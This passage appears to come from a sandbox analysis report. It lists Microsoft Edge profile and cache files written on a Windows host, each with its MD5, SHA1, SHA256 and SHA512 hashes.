| SHA1 | 0fdf9c5e1eca35807b78959c05b9886951fabb20 |
| SHA256 | 16db9282e1fb4679009f7b1f4cb6d29ef04f5812532fd1a80605557593aaaabb |
| SHA512 | d95651a6cd1a73d70ef4bb46ba01267c5fd636f879afffe4fe1d00273f3c3a9ae664e15ce287c78dd4b255af71148e4a285836be119236aaaee31c9e88cee41c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a5a1c6662316ca3f5ce4733436dd1825 |
| SHA1 | a310e6f5a8176c1da7af49b2fcc5bb5f7371b38f |
| SHA256 | 9a9b92bb0e55296d5fea5f546dcbcd3254d383234e3b0ba872555965aa76b4d2 |
| SHA512 | 4e2345222268c4a433214b96550bd272a8e02ed7ca31c0b91bd759bb6c3550adc305abb583a7237678fe6fa7d5133d1aadc8b6f0f3c65e6eedaaa28c4f626c66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | c3c0eb5e044497577bec91b5970f6d30 |
| SHA1 | d833f81cf21f68d43ba64a6c28892945adc317a6 |
| SHA256 | eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb |
| SHA512 | 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
| MD5 | 9e3f75f0eac6a6d237054f7b98301754 |
| SHA1 | 80a6cb454163c3c11449e3988ad04d6ad6d2b432 |
| SHA256 | 33a84dec02c65acb6918a1ae82afa05664ee27ad2f07760e8b008636510fd5bf |
| SHA512 | 5cea53f27a4fdbd32355235c90ce3d9b39f550a1b070574cbc4ea892e9901ab0acace0f8eeb5814515ca6ff2970bc3cc0559a0c87075ac4bb3251bc8eaee6236 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f
| MD5 | b15016a51bd29539b8dcbb0ce3c70a1b |
| SHA1 | 4eab6d31dea4a783aae6cabe29babe070bd6f6f0 |
| SHA256 | e72c68736ce86ec9e3785a89f0d547b4993d5a2522a33104eeb7954eff7f488a |
| SHA512 | 1c74e4d2895651b9ab86158396bcce27a04acfb5655a32a28c37ee0ebd66cd044c3c895db7e14acc41a93db55463310425c188a7c503f0308ce894cf93df219f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
| MD5 | 74e33b4b54f4d1f3da06ab47c5936a13 |
| SHA1 | 6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c |
| SHA256 | 535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287 |
| SHA512 | 79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | caf6e9f4d1b4799d1ca695ba186c935e |
| SHA1 | c02c75b4bbd5586ab015ca9168819e281d347cca |
| SHA256 | beb95240a21b12a580e538894380c6ca3892f26ee71b7f9e479bd38482412396 |
| SHA512 | f00895af3cbd23cb006a8f0f3c2ebec59b1013a6a562e94a27e409e26a6a3c9315b631d460eb665927a18fff0d0b358945419baf94facb209319bccc997cbb4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2b2ae095a942a2961e18cf80e6b6515e |
| SHA1 | 8909fcb5e4cb5320840e6eb07e25e741bdb6012c |
| SHA256 | 1ee7bf375354a6b66b687c0e18386fe7eea48315c475f901c9a749b425861589 |
| SHA512 | 690748971e34acbc4636bd511644123c6220b0311358bc28384f16f79620af2160fdb1d9ca800f7b3d1a6c11ed8664f980662eb2038f926483467977ecfaa477 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | e6ea40afc1045a795ca14ee03a53a4bf |
| SHA1 | d8ef244624361de09ee121108ce4ad2c27129a38 |
| SHA256 | d46495052b29bd110b9a0882c4ea8b8478e99b0d49cfb20976a37e2a1d196795 |
| SHA512 | 18b8ad2c34d38ebedae56e5f927fe01d21a03f414c508b04479162edd915782e17a57a7bd8cf0a36902f2b0c29878bc8ce34f00f1d614eea8a190d2c71395b91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 05be02042122b53fd1a4a30ee28c4875 |
| SHA1 | 5fef1ec6f2f36b5fb3bd538fb6b88ff2cc842a60 |
| SHA256 | 9952222e95c2d329668d4ac52c7202d6bfda9ad742f634f6402a6373e720a7b9 |
| SHA512 | b1f779d671dd4abd12cd3abf00b3bce030496954098bf604a72824caa3674bbe6836d84ed2314fc450ab89e362fe9cea4ceb2d3cfe3d77e84c788371a14e3c21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b
| MD5 | a91c8acf084daefe905c538075d9e3ff |
| SHA1 | 398a0d67e3e87fb1f01a644a5b9820ab5d5d69b6 |
| SHA256 | 9901aba2e46fcf181f9b641590df7bba839243151e8747c1e6798703798bf4af |
| SHA512 | 2c0aaa2bd478af9cd3424bb483260dfe174f1c02ee1638565c6dfe43f7181e12e0788dfcd19316c6a884dbb02144ffb35fb886caedcf29f8a2c65ba70079fc0e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8b0ad54011ad9050906600aa85522dec |
| SHA1 | bb0c80516159623e688683175aaa5d815e68bfc1 |
| SHA256 | 46d80977902b9cf3346a9b9a40f7c01c8c0a4ef374987c89abe2ddf2d547d452 |
| SHA512 | f04231b61a261376a7cc2823ac4830b6d22a3f655fcd49814657beceda02351cb088559df3045eb312b8c1916efe7080dd36ae20923b31cc8e9e7ee0be0ce9a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cfa925299a95b04f6c3e828b67fb7879 |
| SHA1 | 0b13ee5b865daf8b4265b406e87a6554d0fba66e |
| SHA256 | f2328475d9d187d0c413030d427f31f0dc8d5c04478df952a8752518fa7be97c |
| SHA512 | 2be56188636aa01ddb020332cb927d3898911c4f2d2a55a327cc7b956b44663eb17c0d58a17da76405f666919eb5eb49b69c428880dacfe1daeb6759477bd8b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 27ac2fa3c673621889c3166c9246fef8 |
| SHA1 | 37b6fdb516558aa3ada7c8882e893f580a884cef |
| SHA256 | 05a3449e01c86cb2010703bb585bef7b397bb21b24c3888122867cba036b0f65 |
| SHA512 | 7981c07991938007c0490ee0e7408a522bc8c31efd44e229052f79ca4995e0a5d16e1909c459a8de6fcedeb175aa20cab0a62408fab6eb43cc92657de1c054ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b140595e4b91ef0802688b34fbe187d9 |
| SHA1 | c25260e9c7fca150ca00ba4a3e8612a8cf5e1296 |
| SHA256 | 01098bebb1029aad6930d80fc640f32aee3e2eadb65914a9151040af58440f0e |
| SHA512 | 9d7ad792cb99e422bce062154963e8edc8e08a93d009caceaf9f358eabf4bfbee918d51a00314239505d26a61960d023d46d123f2531116ff5f0561cd272fde7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023
| MD5 | 620dd00003f691e6bda9ff44e1fc313f |
| SHA1 | aaf106bb2767308c1056dee17ab2e92b9374fb00 |
| SHA256 | eea7813cba41e7062794087d5d4c820d7b30b699af3ec37cb545665940725586 |
| SHA512 | 3e245851bfa901632ea796ddd5c64b86eda217ec5cd0587406f5c28328b5cb98c5d8089d868e409e40560c279332ba85dd8ce1159ae98e8588e35ed61da2f006 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000062
| MD5 | 1b7ac631e480d5308443e58ad1392c3d |
| SHA1 | 95f148383063ad9a5dff765373a78ce219d94cd7 |
| SHA256 | 7fb66071ac6c7cfff583072c47bc255706222c2a4672c75400893f4993c31738 |
| SHA512 | 15134314dfd36247db86f9b3d4dcb637e162f8fd87c0ce73492ffdb73a87492fc80330655617f165dd969812ed2ebcc42503f632d757bb89ba9116137882119d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 2d78f94bdb85b2621a5f557521d863e5 |
| SHA1 | fa2211e6fc8b6d6b93c9e605d761de28fe0bd883 |
| SHA256 | 9c6d3ecc93395067c86ed1c284b618f73eecac8e3467f4bd55e79288d9793282 |
| SHA512 | ced4ab9b53836a11a413fc0d9cb25ee1dc791b430fe54874a0205bcd4aa41b09a6c610d4a25e7d6325cbddfaa1b11a008d1168a6cb16d5683808d29a2960afd7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0d6a95b493988346f62f2e5aefdb1caf |
| SHA1 | b7e49fa1aa2bc026ec0680f6afe729f3180a6253 |
| SHA256 | 486e183bac1dbe38934bbe857332879da557c2c7aa4fff471724d6f15451bfc4 |
| SHA512 | 26fa436f3f05a7138262a2c5e4e95229dfbefbbb1d3d2384153b1d60c34487a65559e40abb277a4316ecd56e4996010822830398f39d0157b2e97a5e478d7289 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f96527a901d7633344ea6fbe11cf981c |
| SHA1 | d102695aed71e82a962a8c24e2250c8250156ccf |
| SHA256 | f52ddf49f88d36ad0842f0b285d785c22115636ee6536b441c4ecba534bede97 |
| SHA512 | 480d9a1c068f58af25478529593b67c34934f5e40c51b19da0de4bc631ab74b726f0d7f3d7b901c127348604ac162be6b13059a5d1534918aafcf8a1daf1409f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d
| MD5 | 94bc219ff76d0e943d6787c8a1413a14 |
| SHA1 | 84110b11d9582071fdc79e2d962746ee7e7092d9 |
| SHA256 | 06fbb5de26733f8e2269660afb8e4efc0e0e0c5172feefe9cdd229be657e4be2 |
| SHA512 | 1f6d48f5f3461d4502b2917501053d045732e4bc1cfa870aac090458019d607f982b113838597a5bbb6bcc14d710638c3436f2d33b8cf8c5688252b6d224d725 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000063
| MD5 | 46e6043b3a70e5986f0b72a748d9e3e2 |
| SHA1 | 5d3ac460401a49fb84286e0f8b9edf6167530fa6 |
| SHA256 | 171b12a8c0900d5f0d9e700eb668c02f167ad6f7adce4b9c36201ee10aeae005 |
| SHA512 | c0f875ed0d9e05a7439ac9d160edf59ed3b1b384b87dca5b75de3ba11a47a94d543f108ee60aaf421c965c0635408003535795e0f6601afdef4010d982724385 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a830ed38bb87848fed4af1393965a5d6 |
| SHA1 | 7294dae0f56fd5269a30c4648256458e4877e28e |
| SHA256 | 7a559d4f9622d27bd2651f5bd2c4cd5754fe317c11e512694aee79f4d4de9ff4 |
| SHA512 | abac26ffbade527ca1349dfd1778d8273213763644df4fe82279c58b65e9372686ceb1f50f200dfc1e60af2c297b176a6da971451b7d7330118d3ed65a9fbb1f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 640386f3b915c92686289a9854df10a1 |
| SHA1 | 5dfcde99472f51667abd89261c08d905c597811f |
| SHA256 | 62555d5741c3c34d6d016db576058b7d5bd724797ec86b48291db6d14d218870 |
| SHA512 | ab59514724a68560efe40cbe538d6ef885799770259c92b1dcff1b7a329b81be6d092131a70ee32630f7469e888114fec0ef9bddfaa46ff850eec34f08ddb3fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 22f345542836b8c950211480f9e45116 |
| SHA1 | 36faf1f02013f9134438dfc9916a40a7a8b2e392 |
| SHA256 | 835b689f4c62ac95f44685628ee0e8c155669e982536081742be6c2169060fc4 |
| SHA512 | c1a3a3a54cd1e95d83d97aa2dfef3650c53311d6841dfcd965d23a87f70bd6e4be997fef508e300c881873ce7d8924a5472bd38d8fbab941fd4cfab0883f47aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1409bb4a17038b9739b80874a22ccedc |
| SHA1 | 89383c048b12b362bf9b819091342e55d4887fa0 |
| SHA256 | 78d3b62d18c5da9a378cba5e8ce67c9661ffe1866a5e3522b59d0c9b55abf616 |
| SHA512 | 7f1f983a8c366424346f4b854cb8d23b708d6c181e86bf4ae8bfcae3eaf3301d035f4cfb655f3a9fa3aa32f4cc79cffe1c6bd068d4ff5cdf8daf2fc067c62f31 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ba600d35132c3753eac24caa096709f3 |
| SHA1 | 2643c6bc3ebe614fd64d901781bb69a862797b7b |
| SHA256 | 60af37fd81b71480b0f7ec6fbf390aa9d180d31b7be6a8f5887367be25b56c2c |
| SHA512 | 2c28239b7a6c06304a3935420374d6754bef1949a61b9f082d22ecc1cc9703e3d229d725e063752411a0c0e9ada373a90a1700b1f23e90b1ff4a5b7fc58d6d7a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056
| MD5 | 3302c3d199cc000492f64e435196cdbc |
| SHA1 | ce1e5fb78e92253c754e8ee34df74feaa45863c5 |
| SHA256 | 7104d85d83750d42ffa98375b66e70b19895a23aaa0da309a99d1abc3fb7d46c |
| SHA512 | 89597d65306707b63f95187c68ebf5aaf194a5b87e043a9777c5fba3fcc2ee21565a21c4fbd717c5f7feae65064b9b7ae27114b949722e8dcf69fdd20320122e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000057
| MD5 | 7651b1187bb58ac4c7be625337b35e5b |
| SHA1 | 307d969ef4137a66fe2793737dc1c546587c7f43 |
| SHA256 | 0632850d01a46bc2f8c223155a4bf6c398b33596bb711e098440623f118c3968 |
| SHA512 | a81d2f768af155bdc642941404e7ddf95a2cea33c9374acb5fe32f6f5266e337fbef32f904551f61fcc9f9ab5a1c6a5ad130ab85b38bc2258e2f82c0ca1e9c7a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051
| MD5 | 97445efcad5274e3355ff088c0734ce4 |
| SHA1 | 7058b40a1263f9e562ad55200d80e5ba739ddca6 |
| SHA256 | 721e4869bc4c8f0f31d7455c0cf6eab0f634c92e78af13061d1e66fb88f153be |
| SHA512 | ad9dcd31b7f02e48a942c0dcbcaeb7764cb1eb94710252b94d8abe5f41a07e8ba8fda5be049ce4bb6f2d8dcba9e82a1f49a831ebb9e7d7c86afec05e6412b5f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000070
| MD5 | 9cc74dab45e360d90c7f3f189e18b9a8 |
| SHA1 | aca1940329422b99516d4b48a30700c8cdc2d042 |
| SHA256 | fa9471b70365a74dfa7d7ba7fa80ca30dd332c9e6fdb91726e005680d10acb3c |
| SHA512 | 6216a5236c4ac47aa3ebafb4e8ba04930f96b4ea5934a30771b197dde0f4225c08372e8394fd93b6ace14ba6867345cef41930806cdb49e56ef9fc8571d77eb2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054
| MD5 | efbe7b6d187dea0d7f803276c6bcf37c |
| SHA1 | de5905dea9fdb2ba98cace82fe80eaf4385f233f |
| SHA256 | a04d2b858190dccad1f3bf431b96d150a10a87d0e436249347f9ebe8721a85a9 |
| SHA512 | 3f627e3b4b59fc9b2f8a787b2095e71c0fbfbc43c61c60b19eae084186bef531b05043d65a47d60daf60bcf805078870335585df388eb631bb6d983fdafdaf0c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053
| MD5 | e7789186ec22ea8caf2d9978b893baea |
| SHA1 | ed0f94668dd8e43e8bc4f3c2e50654ec3029255b |
| SHA256 | 4ff5155985f6257327889a66f2974aba80fa396dd9d6245bf5cc92fe48343eaa |
| SHA512 | d1c798badfa37be51ad621d7b2b34bffc041dbbeb38631f00765310689fca14e1a37831b209ac7332d537d4ce8893ec02ea2990de255400d843f4402564ef93d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000055
| MD5 | 67e30bbc30fa4e58ef6c33781b4e835c |
| SHA1 | 18125beb2b3f1a747f39ed999ff0edd5a52980ee |
| SHA256 | 1572e2beb45d2de9d63a7e7fe03c307d175b2b232bad2e763623dceb747729ba |
| SHA512 | 271d4a65d25b0a5d2ff2fe8f3925fc165d9b4345893abfd919061d78ffc5ffe8890ded35e41274ad8b860f06264b027cfea6030ec9411a4e03bc6d7cb4d4d228 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000059
| MD5 | a3d206234b56331963ad9ca0dc94a807 |
| SHA1 | 5cf806150e0ad8a26a73a895aeee03da23e75ecf |
| SHA256 | 8a0d7b42cbbb3159891a12810cc8c36d53ae0634404ae938db894983e46812dd |
| SHA512 | 13f3260ed071fcea410e2e38908b9643285e4b50518ffd1fb15838c87835128f6f5a4150e5bce646ab63905b6c7108a70c3cdb0f76ade48ce2d8bb610b93412e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005c
| MD5 | 27e0b0d117c9b50b2dd782e77926c41a |
| SHA1 | f6b69d3570bca5026ce8fd3670224d4f10a5d833 |
| SHA256 | f7fa3985fcc91607f1afd125a17333779a8c3e2fbae3a243b1238bba4c63548d |
| SHA512 | 632371a460db88e640f90e543bc83b3163ca3d23c474b5ebd6ede20949869886727129538d213a33549d70cafec5ff64256c743f7f87bb140ccc19da03eec002 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005b
| MD5 | edf8906bf0f8ed9cb2746d41333085d1 |
| SHA1 | d7f11d2f5be80a8f4a9dc56726991fd342c2cdd7 |
| SHA256 | 345357e8e6c3b76bae5266a7ec1af790542f6d6668881bc249da7b643032600b |
| SHA512 | 594ae78e4089e790c04849ed33e8f9f33772eea93e66b4271ede8ff8330308d3072df2af714186982864ee5d00242685988d8149d027d8dd5ff4e985339be3bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005a
| MD5 | c43180875a134a0de1021b02c11518f0 |
| SHA1 | 8cbe85cecaf1ba019f1dfa27339a41f9f824d5df |
| SHA256 | a35f1767cff2c910b8485a038a8ccfd73ebc8fe7b74199dee7bfa8d238f58899 |
| SHA512 | 24e6e3521ce8464216eaeb0f50dc1e5a6eca04717a291c6627337867b4825d2b5d65280c4b02f20efb9b1cad85e50f1ca6fed1a309ef904085708d4f781a7596 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e
| MD5 | d6c0c97507352fbdea15e4a5ba3c0ba1 |
| SHA1 | 0c528a95801032e7641f678550ea0cf37ea030d2 |
| SHA256 | 4d7a44a649d1f1a199e380495c3bb61e84c72a06d5489f9b797698bcc8e4e33b |
| SHA512 | 44ce695fc37875d7cfd6affdaefb8abf103822c2471bd24de741a678f50855821e90bb40b0a3a9bd2c9df1ab1f406009df488773c9282ca89b3fd02b4ca70216 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000061
| MD5 | b7a2ad9645afa7b6047557956d9540e2 |
| SHA1 | afe9d2f2c53149890784506e97057536dc39bd8f |
| SHA256 | 127539d026f851bef3cb66520c714050802898d52a93504114b74da81e197454 |
| SHA512 | 612416421dffab66c38e80bb3b26884384e5029f906f1d7ef8b3f9a38948b52dc3c0e31dcd9a704f76416c8b8119addc1783d0bb229b229dcf539f0361c05a52 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060
| MD5 | e7ebe1f25cf841afba418b6adb14c03e |
| SHA1 | 6323caeca2bb3874af83434c5494123536586754 |
| SHA256 | 44fbb37daa889bc223f935f35f2a689b19a5963f04889c5e8e6c92d39fe90b42 |
| SHA512 | e8ff648385cdb5ff2fea918d588008722c1f6b4f6ea1852194d5412e27dcbc1e0df3f3f8b1d5a3164b7120ee34656aa2cf639d46a151eb90e828218ef7200a9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d1eed51fd30a293c_0
| MD5 | 829b9869a354534f157f59445c85528f |
| SHA1 | 32278f14da5202e5a3e2f14a22466e9f9abfcc27 |
| SHA256 | 11547a34bcf599d49c74168bc8fdb991c007c9307ad1b9995fc11bba705481c1 |
| SHA512 | 34d50da5bc9cb7390939282302db94e8ee4e5907c77f2c2cc39faf6457687a40d187b59130d79a7f48f1e70ff56465f53ec09dfd49ca3e9625887ac0f5eb8660 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_en.softonic.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_en.softonic.com_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006e
| MD5 | 9c6b5ce6b3452e98573e6409c34dd73c |
| SHA1 | de607fadef62e36945a409a838eb8fc36d819b42 |
| SHA256 | cd729039a1b314b25ea94b5c45c8d575d3387f7df83f98c233614bf09484a1fc |
| SHA512 | 4cfd6cc6e7af1e1c300a363a9be2c973d1797d2cd9b9009d9e1389b418dde76f5f976a6b4c2bf7ad075d784b5459f46420677370d72a0aaacd0bd477b251b8d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000095
| MD5 | e8a1128d38affdf098f1bffb3b9f4406 |
| SHA1 | 4e499a993b2b0b5bf6e005015146f98f5e447ed2 |
| SHA256 | f396f7186913744396d418b82b49b283f0aca0befa0410f44f210e3b03a83b4c |
| SHA512 | 2ab228e1ae08d9276884299a75c41fd4102ed63c26723a31607a4082d9a4099f14e006178a8ac383f8ee57db2ec11c57ca756b09c0b858a63d744d467c5bb690 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | be709c5a280cec390e39dd50db08b90d |
| SHA1 | 187f05ccbfe41fec0c7d8c3313bf77bc0f6d550c |
| SHA256 | a2bc719bef01e5dba73c95cfdb34d2827dc6fad0e9ee550ff793efbb4bc7e1d0 |
| SHA512 | 7f6c8765a115ea6771f662283bd6d7c3da3e3ee1b7b3ae9b8f4e74f305c577cb2b84c1ccb3e6e748fb91c83420e1a1c990b35ab8dc1b40aac6ce0ab7d6343e83 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 705a2b391310a135593c70e033c1b69c |
| SHA1 | d1ec486a0ad28bd8cb399e199b623e2fd1537da4 |
| SHA256 | 09548d40af85f1071a3366a2c8b6fbdf47894c845a01dd199db4e7370c36cecc |
| SHA512 | 09751a8d415e48a935f42351f2af92044f7e60a4d61fda4a63100fc411e9968b7bea7e001fd6d4cfc6cca41f1f086b3ba1eb7b1d591c6be2f5e322ef9fe5467e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a14b636b2ddd46c48e22334508ec0d34 |
| SHA1 | 95d401b98f913d8df99db75713a7a3667362df3d |
| SHA256 | d548e99ba2c100b5027a3c6a149dc496a2909fff4b917dd21d378dd8943c1dd6 |
| SHA512 | f23fc9c60fb78e20ecfd3e968be243cfda15c208c8f4623b7cae07ef33c58223765839b1068f90b19c02f2eb4915f20902eb9c6e7361d4b930045390b1502f8a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 41b74ad3c7e827d13df8ad2bedbd522a |
| SHA1 | ea8e29758796ed08ecd6ffb797b30f294e2f93aa |
| SHA256 | 64422c30c05ffdcbb75b43ef228b32d31fca4616b08437b5dbdfae59c6d64870 |
| SHA512 | f97e590343fcfbc4e7709bf3178198ef5c0437ebe6b0003ec9c8b5338b57ca09c88cdbb23c87a9130e2d6e683db6e32413892cdd700265bef27595184cf74737 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b80cbf36fef9e7a0_0
| MD5 | 6b41588f78ecfe69dbafad4447095e5b |
| SHA1 | b6d0f5be0d508a784c7142afdb50bbae02caca2b |
| SHA256 | 5a1fdb860a53bfa4bb3baf38281ae7324716093a6806603127b5246f1099f7e4 |
| SHA512 | 63a7b88a26461e775802d75294842421eed839dc554240b5efd1bf879b6e2569730a5a602bd435eb182ad5cbfab5765c3839b93bfc41a18de22381c339b1a13d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a0
| MD5 | 900e217361ce1f52ca334eafa055ede9 |
| SHA1 | a744d334b154b6aefaccf685526156cdf3f82e7f |
| SHA256 | 6e50c78089d18760870450e7e82bdaf56c75ef916b4b9e06ea3ee5d74517a9bb |
| SHA512 | 90e568da4878070c82c7c0dfbf617ec6524ea61c805bda867dd173ef85d8026618aecb5d38a15e838952a6a77b6326caadede433ecd401a910de760b610033fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a5
| MD5 | 1cb357ae9f1541d4e0317f5e1151f03e |
| SHA1 | 97d228cb80ad0e3e825a208cba9a22a9b4e72c9d |
| SHA256 | 02aee346bf43f006fba08e5e833dc7474b1086bc45a3a512b46b726369d5ada8 |
| SHA512 | 087ecfd36482a571dbf2fd7bb1ab17186d49d15cf286333b4ac7715cd1f32c4b8abb9b7685fb2f5bef5e182be8464fefa19269a85c32ce418edbec26d5a87f67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d75c9002ed1d82d0dbc17eb3083ea5cb |
| SHA1 | 8d5d7dd336fe33c086c6fbe00ef2ce0c58932152 |
| SHA256 | d2c355c54bfab22708638509f832c18ce9e630945d854430fafcbafe25c60ab6 |
| SHA512 | 2313984708f6648821db061e45e72fe0e9dbf8a700d463726fa976edf9d9b610a0945d9d5224b408bc22309ee85efa4a709af78e5d727006b7d159a197e54195 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000aa
| MD5 | ed20984592313d7070e996b2ef6e05bf |
| SHA1 | ff59467416da2142aef246bdf3fdb1da2018597f |
| SHA256 | ae2399f4d40dfde8294224739261b759687ce4e7a828537d0a06943af4f6c36a |
| SHA512 | 233f689631f95e9bb304a40abdc3e00e20de9dbd47ceff494d13e0a0cf05c3ce09bd1dc1c30cf170ee2ae337300fc26db45e64d0f61e6b742695092601074dae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ad65f8cc700f771e_0
| MD5 | 9dfc7d720a93319245863517a2faea6a |
| SHA1 | 01bf0f511f6d57e398999a58f94a2ed656970041 |
| SHA256 | 4724f6af271d6b894c34fe69d4442d5d4c1657788b70a3943f6e06bc1e7d4c79 |
| SHA512 | 350371b5d2b88a86501b218b6dbbc404f7e9665ad17c8658741fbac04212539a45916b901c4530dc6e458ef370c469cb0461b57e97884d199b38c6190b7a246f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 2d47eb7f08effb9022986f6b01634ce3 |
| SHA1 | 3f6211f05bd5aabe3378093160ecb42a66f5bf4c |
| SHA256 | bd2e1416d11217bc7ed9dff4d0e5713804fc2c9de965294d97785d05921131e5 |
